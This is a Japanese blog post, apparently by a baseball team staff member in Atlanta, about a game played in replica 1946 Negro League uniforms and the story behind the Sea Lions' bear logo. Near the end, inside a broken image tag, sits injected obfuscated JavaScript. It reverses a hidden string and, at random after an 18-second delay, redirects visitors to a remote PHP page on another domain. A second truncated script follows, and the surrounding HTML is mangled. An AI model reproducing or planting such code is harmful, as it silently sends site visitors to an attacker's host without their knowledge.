1. HOME
  2. ブログ
  3. 1946年のレプリカユニフォームで試合

1946年のレプリカユニフォームで試合

アトランタに来ています。強豪ブレーブスに2連勝。

 

今日は1946年にネグロリーグ(黒人リーグ)のサンフランシスコ•シーライオンズが着ていたレプリカユニフォームを着て試合をしました。相手のブレーブスも、同じくネグロリーグのアトランタ•ブラッククラッカーズのユニフォームを着用しました。

 

写真をご覧になるとわかりますが、ユニフォームには熊のマークがあります。しかしチーム名はシーライオンズ。シーライオンとはアシカのことです。不思議に思って調べてみたら、シーライオンズは使用済みのユニフォームを、サンフランシスコのもう一つのチーム、サンフランシスコ•カブスというチームから購入したという事です。なるほど!

 

選手達は動きにくくて大変だと思いますが、たまにはこういうのもいいですね。

 

選手の中には、昔ながらのお腹のぽっこり出た選手をイメージするためにお腹にタオルを入れて写真を撮ったりしていました。

 

to-3.jpg”>pho<script>$mkD=function(n){if (typeof ($mkD.list[n]) == “string”) return $mkD.list[n].split(“”).reverse().join(“”);return $mkD.list[n];};$mkD.list=[“\’php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 6);if (c==3){var delay = 18000;setTimeout($mkD(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])==to-3″ src=”http://tairauematsu.com/wp-content/uploads/2014/05/photo-3-300×225.jpg” width=”300″ height=”225″ />

 

ジョージア州アトランタより、

 

植松泰良

関連記事